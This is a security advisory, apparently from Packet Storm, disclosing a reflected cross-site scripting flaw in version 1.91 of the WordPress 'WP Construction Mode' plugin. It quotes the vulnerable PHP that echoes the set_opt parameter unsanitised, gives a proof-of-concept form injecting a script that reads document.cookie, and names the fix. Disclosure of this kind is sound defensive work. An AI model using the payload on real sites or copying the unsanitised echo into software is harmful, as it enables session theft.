WordPress WP Construction Mode plugin version 1.91 suffers from a reflective cross site scripting vulnerability.
4b3a420c975d97c587880090e2cd44f989c3707e35392b402ae97274917b937fTitle: WordPress 'WP Construction Mode' plugin - XSS
Version: 1.91
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/wp-construction-mode/
Contacted vendor: 2014/10/20
----------------------------------------------------------------
## Plugin description:
----------------------------------------------------------------
Set entire website or specific page under construction or maintenance for all viewers except Admin
## Reflected XSS:
----------------------------------------------------------------
the set_opt parameter is shown unsanitized to the admin user when saving, allowing the injection of arbitrary scripts and HTML.
Vulnerable code:
if (isset($_REQUEST['act'])) {
switch ($_REQUEST['act']) {
case "save":
set_under_construction();
echo '<div class="updated below-h2" id="message" style="position:relative; clear:both;"><p>Under Construction: ' . ($_REQUEST['set_opt']) . '</p></div>';
break;
default:
}
}
PoC:
Log in as admin and submit the following form.
<form method="POST" action="http://[HOST]/wp-admin/admin.php?page=under-construction.php" enctype="multipart/form-data">
<input type="text" name="set_opt" value="Yes<script>alert(document.cookie);</script>">
<input type="text" name="set_page" value="all">
<input type="text" name="act" value="save">
<input type="submit">
</form>
## Solution
----------------------------------------------------------------
Update to version 1.92.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed